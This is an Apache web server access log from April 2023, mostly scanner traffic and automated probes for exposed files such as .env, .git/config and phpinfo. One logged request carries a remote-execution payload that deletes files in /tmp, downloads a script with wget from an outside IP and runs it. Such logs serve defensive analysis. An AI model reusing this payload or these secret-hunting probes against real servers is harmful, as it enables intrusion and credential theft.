185.254.196.173 - - [04/Apr/2023:17:37:16 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Apr/2023:17:44:19 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.152 - - [04/Apr/2023:18:28:09 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
135.125.246.110 - - [04/Apr/2023:18:29:33 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
::1 - - [04/Apr/2023:18:33:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:14 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:15 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:16 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:18:33:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
43.154.128.189 - - [04/Apr/2023:18:37:50 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.62.169.183 - - [04/Apr/2023:18:38:17 +0000] "GET /install/images/v2_logo.png HTTP/1.1" 200 - "-" "python-requests/2.27.1"
185.254.196.173 - - [04/Apr/2023:19:08:34 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.126.12.216 - - [04/Apr/2023:19:08:36 +0000] "GET / HTTP/1.1" 200 8385 "-" "python-requests/2.25.1"
185.225.74.198 - - [04/Apr/2023:19:12:29 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [04/Apr/2023:19:12:29 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [04/Apr/2023:19:12:29 +0000] "POST / HTTP/1.1" 405 409769 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [04/Apr/2023:19:12:32 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [04/Apr/2023:19:12:32 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [04/Apr/2023:19:12:34 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [04/Apr/2023:19:12:36 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
135.125.246.110 - - [04/Apr/2023:19:49:06 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.142.125.214 - - [04/Apr/2023:19:55:37 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
162.142.125.214 - - [04/Apr/2023:19:55:37 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.214 - - [04/Apr/2023:19:55:38 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
162.142.125.214 - - [04/Apr/2023:19:55:38 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.214 - - [04/Apr/2023:19:55:39 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.214 - - [04/Apr/2023:19:55:39 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
43.154.128.189 - - [04/Apr/2023:19:56:09 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
38.6.173.54 - - [04/Apr/2023:19:56:25 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "python-requests/2.27.1"
193.32.162.159 - - [04/Apr/2023:20:02:54 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.180.143.137 - - [04/Apr/2023:20:03:14 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
104.197.124.179 - - [04/Apr/2023:20:30:45 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
104.197.124.179 - - [04/Apr/2023:20:30:46 +0000] "POST / HTTP/1.1" 405 422693 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
185.254.196.173 - - [04/Apr/2023:20:37:13 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:20:37:14 +0000] "POST / HTTP/1.1" 405 409708 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.104.11.46 - - [04/Apr/2023:20:59:39 +0000] "\x16\x03\x01" 400 226 "-" "-"
180.149.125.165 - - [04/Apr/2023:21:02:33 +0000] "GET / HTTP/1.1" 200 8387 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
43.154.128.189 - - [04/Apr/2023:21:14:46 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
167.248.133.52 - - [04/Apr/2023:21:16:39 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
167.248.133.52 - - [04/Apr/2023:21:16:40 +0000] "GET / HTTP/1.1" 200 8378 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.52 - - [04/Apr/2023:21:16:41 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
167.248.133.52 - - [04/Apr/2023:21:16:41 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.52 - - [04/Apr/2023:21:16:42 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.52 - - [04/Apr/2023:21:16:42 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
170.106.115.39 - - [04/Apr/2023:21:28:19 +0000] "GET / HTTP/1.1" 200 41226 "-" "curl/7.64.1"
209.141.44.114 - - [04/Apr/2023:21:28:31 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
209.141.44.114 - - [04/Apr/2023:21:28:32 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
205.185.122.184 - - [04/Apr/2023:21:28:41 +0000] "GET / HTTP/1.1" 200 8440 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
205.185.118.120 - - [04/Apr/2023:21:28:52 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
179.43.177.242 - - [04/Apr/2023:21:42:16 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
193.32.162.159 - - [04/Apr/2023:21:47:40 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.254.196.173 - - [04/Apr/2023:22:07:24 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.110 - - [04/Apr/2023:22:17:45 +0000] "POST / HTTP/1.1" 405 409706 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.102.61.10 - - [04/Apr/2023:22:18:03 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "python-requests/2.26.0"
94.102.61.10 - - [04/Apr/2023:22:18:04 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "python-requests/2.26.0"
94.102.61.10 - - [04/Apr/2023:22:18:04 +0000] "GET / HTTP/1.1" 200 8381 "-" "python-requests/2.26.0"
198.235.24.3 - - [04/Apr/2023:22:27:30 +0000] "\x16\x03\x01" 400 226 "-" "-"
82.193.118.248 - - [04/Apr/2023:22:27:59 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
43.154.128.189 - - [04/Apr/2023:22:32:49 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
161.97.174.25 - - [04/Apr/2023:22:33:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
161.97.174.25 - - [04/Apr/2023:22:33:11 +0000] "POST / HTTP/1.1" 405 422661 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.79.181.104 - - [04/Apr/2023:22:56:19 +0000] "\x16\x03\x01" 400 226 "-" "-"
161.97.174.25 - - [04/Apr/2023:23:02:44 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
161.97.174.25 - - [04/Apr/2023:23:02:44 +0000] "POST / HTTP/1.1" 405 422643 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
198.235.24.140 - - [04/Apr/2023:23:05:29 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
104.197.124.179 - - [04/Apr/2023:23:08:23 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.197.124.179 - - [04/Apr/2023:23:08:24 +0000] "GET /phpinfo.php HTTP/1.1" 200 24273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
141.105.66.148 - - [04/Apr/2023:23:22:46 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "GET /Portal0000.htm HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "GET /server-status HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "GET /yc9G HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "GET /Portal/Portal.mwsl HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "GET /nmaplowercheck1680650573 HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:55 +0000] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:55 +0000] "GET /__Additional HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:55 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:55 +0000] "GET /docs/cplugError.html/ HTTP/1.1" 301 287 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:55 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
141.105.66.148 - - [04/Apr/2023:23:22:55 +0000] "GET /NmapUpperCheck1680650573 HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:54 +0000] "POST /scripts/WPnBr.dll HTTP/1.1" 405 407341 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:56 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:56 +0000] "GET /Nmap/folder/check1680650573 HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:56 +0000] "GET /docs/cplugError.html HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:56 +0000] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:56 +0000] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:56 +0000] "GET /CSS/Miniweb.css HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:57 +0000] "GET /home.html HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:57 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:58 +0000] "GET /home.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:58 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:58 +0000] "GET /main.php HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:57 +0000] "POST /sdk HTTP/1.1" 405 406201 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:59 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:22:59 +0000] "GET /home.jhtml HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:23:00 +0000] "GET /admin.cgi HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [04/Apr/2023:23:23:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [04/Apr/2023:23:23:00 +0000] "GET /indice.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:23:01 +0000] "GET /localstart.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [04/Apr/2023:23:23:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [04/Apr/2023:23:23:01 +0000] "GET /admin.html HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:23:02 +0000] "GET /menu.jsa HTTP/1.1" 200 - "-" "curl/7.54.0"
::1 - - [04/Apr/2023:23:23:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [04/Apr/2023:23:23:02 +0000] "GET /indice.aspx HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:23:03 +0000] "GET /menu.asp HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:23:03 +0000] "GET /indice.jsp HTTP/1.1" 200 - "-" "curl/7.54.0"
141.105.66.148 - - [04/Apr/2023:23:23:04 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
141.105.66.148 - - [04/Apr/2023:23:23:18 +0000] "-" 408 - "-" "-"
::1 - - [04/Apr/2023:23:23:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:23:23:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:23:23:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
141.105.66.148 - - [04/Apr/2023:23:23:45 +0000] "-" 408 - "-" "-"
::1 - - [04/Apr/2023:23:23:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
186.233.73.163 - - [04/Apr/2023:23:30:45 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
135.125.246.110 - - [04/Apr/2023:23:34:27 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:23:36:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:23:36:57 +0000] "POST / HTTP/1.1" 405 409746 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.126.12.216 - - [04/Apr/2023:23:44:10 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [04/Apr/2023:23:50:42 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
15.206.128.154 - - [05/Apr/2023:00:16:30 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
15.206.128.154 - - [05/Apr/2023:00:16:30 +0000] "POST / HTTP/1.1" 405 409741 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
15.206.128.154 - - [05/Apr/2023:00:16:34 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
15.206.128.154 - - [05/Apr/2023:00:18:48 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "python-requests/2.26.0"
15.206.128.154 - - [05/Apr/2023:00:18:49 +0000] "POST / HTTP/1.1" 405 409655 "-" "python-requests/2.26.0"
193.32.162.159 - - [05/Apr/2023:00:47:37 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.254.196.173 - - [05/Apr/2023:01:08:12 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:01:08:14 +0000] "POST / HTTP/1.1" 405 409700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [05/Apr/2023:01:08:51 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [05/Apr/2023:01:13:00 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.110 - - [05/Apr/2023:01:29:29 +0000] "POST / HTTP/1.1" 405 409726 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.199.116.84 - - [05/Apr/2023:01:31:59 +0000] "GET /portal/redlion HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
135.125.246.110 - - [05/Apr/2023:02:00:26 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.8.22.79 - - [05/Apr/2023:02:00:48 +0000] "GET /.env HTTP/1.1" 200 - "-" "python-requests/2.28.2"
51.254.59.113 - - [05/Apr/2023:02:05:29 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.61.10 - - [05/Apr/2023:02:07:40 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
159.203.240.17 - - [05/Apr/2023:02:16:04 +0000] "GET /actuator/health HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
43.154.128.189 - - [05/Apr/2023:02:26:45 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
195.178.120.44 - - [05/Apr/2023:02:27:20 +0000] "GET / HTTP/1.1" 200 8383 "http://13.244.159.169:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
185.254.196.173 - - [05/Apr/2023:02:37:54 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:02:37:54 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
